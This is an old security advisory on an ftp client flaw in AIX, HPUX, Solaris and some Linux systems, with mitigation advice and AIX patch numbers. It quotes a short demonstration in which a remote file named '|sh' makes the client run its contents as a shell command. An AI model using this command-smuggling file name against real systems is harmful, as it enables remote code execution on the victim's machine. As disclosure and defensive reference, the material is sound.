COMMAND

    ftp

SYSTEMS AFFECTED

    AIX 3.2, 4.1, 4.2
    HPUX 9.05, 9.07, 10.10, 10.20 (Others?)
    Linux Slackware (Others?)
    Solaris 2.5.1, 2.6 (Others?)
    NTAS 4.0

PROBLEM

    The  ftp  client  can  be  tricked into running arbitrary commands
    supplied by the remote server.   When the remote file begins  with
    a pipe  symbol, the  ftp client  will process  the contents of the
    remote  file  as  a  shell  script.   Remote ftp servers can cause
    arbitrary commands to run on the local machine.  This can  include
    remote root access.  This also happens with netkit-ftp-0.10.

    Andrew Green posted following 'test':

        $ id
        uid=100(guest) gid=100(usr)
        $ pwd
        /tmp/ftp-test
        $ echo "id > /tmp/OUT" > "|sh"
        $ ls -la
        total 24
        drwxr-xr-x   2 guest    usr          512 Nov  3 09:45 .
        drwxrwxrwt   6 bin      bin         1024 Nov  3 09:44 ..
        -rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
        $ ftp localhost
        Connected to localhost.
        ....snip....
        230 User guest logged in.
        ftp> cd /tmp/ftp-test
        ftp> ls -l
        total 24
        -rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
        ftp> mget *
        mget |sh? y
        150 Opening data connection for |sh (14 bytes).
        15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
        local: |sh remote: |sh
        ftp> quit
        $ ls -l /tmp/OUT
        -rw-r--r--   1 guest    usr           28 Nov  3 09:45 /tmp/OUT
        $ cat /tmp/OUT
        uid=100(guest) gid=100(usr)
        $

    List of  vulnerable system  is list  on which  this test  has been
    performed with success.

SOLUTION

    Remove  the  setuid  bit  from  the "ftp" command until installing
    patches.  This will make your fto unusable.  Patches are:

        AIX 3.2............ no fixes available for AIX 3.2 (upgrade to
                            a higher level)
        AIX 4.1............ APAR - IX70885
        AIX 4.2............ APAR - IX70886
        AIX 4.3: fix already contained in the release